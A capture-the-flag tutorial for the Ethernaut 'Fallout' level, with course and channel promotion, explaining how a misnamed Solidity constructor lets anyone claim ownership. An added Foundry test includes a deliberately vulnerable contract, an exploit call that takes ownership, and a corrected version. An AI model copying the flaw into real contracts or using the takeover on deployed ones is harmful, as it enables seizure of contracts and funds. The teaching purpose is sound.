Ethernaut 2 - Fallout Foundry Solution - Walkthrough Tutorial 2023
Johnny Time
Ethernaut Challenge 2 - Fallout Foundry Solution 2023
Are you ready to take your Smart Contract Hacking skills to the next level? In this tutorial, we'll dive deep into solving the "Ethernaut 2 - Fallout" challenge using Foundry. Our goal is to change the ownership of the Fallout smart contract, and I'll guide you through every step of the process.
Prerequisites
Before we start, make sure you've completed these prerequisites:
Watch the first video in our series on how to get started with Ethernaut and set up your Foundry environment for tackling challenges: https://www.youtube.com/watch?v=UWy-CcnulCA&list=PLKXasCp8iWpjYKwk0hcdVDVZlpW_NGEYS
Clone the Ethernaut Foundry Solutions Repository on GitHub (don't forget to leave a star): https://github.com/RealJohnnyTime/ethernaut-foundry-solutions-johnnytime
Subscribe to the JohnnyTime YouTube channel for more tutorials, updates, and the full Ethernaut Foundry Solutions playlist.
Become a Certified Smart Contract Hacker
If you're looking to turn Smart Contract Hacking into a career, check out our full Smart Contract Hacking Course. Gain in-depth knowledge, practice with hands-on exercises, and receive an official Smart Contract Hacker certificate. Use the following discount link: https://johnnytime.xyz/smart-contract-hacker
Understanding the Challenge
Our objective in the Fallout smart contract is to claim ownership. The contract, written in an older Solidity version (0.6.0), is meant to set the owner to msg.sender upon deployment. However, there's no function provided to change the owner.
Spotting the Vulnerability
Upon closer inspection, we discover that the so-called constructor in the Fallout smart contract is not a constructor at all. It's a public payable function named "Fal1out" (with '1' instead of 'l'). This function won't be automatically triggered upon contract deployment, leaving the owner set to address zero. Anyone can call this function to update the owner.
Exploiting the Vulnerability
To exploit this vulnerability, all we need to do is call the public Fal1out() function to update the owner variable with our address. We'll solve it using Foundry.
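The misnamed-constructor pattern described above, next to its corrected form, as a Foundry test. This is an added example, not the Ethernaut source or the code from the solutions repository. The contract bodies are constructed stand-ins, and Solidity ^0.8.0, forge-std, the FalloutFixed and test names, and the test address are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0; // assumption: modern compiler; the page's contract targets 0.6.0

import "forge-std/Test.sol";

// Constructed stand-in for the pattern described above, not the Ethernaut source.
contract Fallout {
    address public owner;

    // Intended as the constructor, but the name is "Fal1out" (digit 1), so it is
    // an ordinary public function and never runs at deployment.
    function Fal1out() public payable {
        owner = msg.sender;
    }
}

// Corrected form (hypothetical name): the constructor keyword runs exactly once,
// at deployment, and cannot be called again afterwards.
contract FalloutFixed {
    address public owner;

    constructor() payable {
        owner = msg.sender;
    }
}

contract FalloutOwnershipTest is Test {
    address internal stranger = address(0xBEEF); // constructed test address

    function test_MisnamedConstructorLeavesOwnerUnset() public {
        Fallout target = new Fallout();
        // Nothing ran at deployment, so owner is still the zero address.
        assertEq(target.owner(), address(0));

        // Any account can call the public function and become owner.
        vm.prank(stranger);
        target.Fal1out();
        assertEq(target.owner(), stranger);
    }

    function test_ConstructorKeywordSetsOwnerAtDeployment() public {
        FalloutFixed target = new FalloutFixed();
        // The deployer (this test contract) is owner; no setter is exposed.
        assertEq(target.owner(), address(this));
    }
}
```

Run it with `forge test` from a Foundry project that has forge-std installed.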
See you in the next tutorial! ... https://www.youtube.com/watch?v=hbLuyGCSCkQ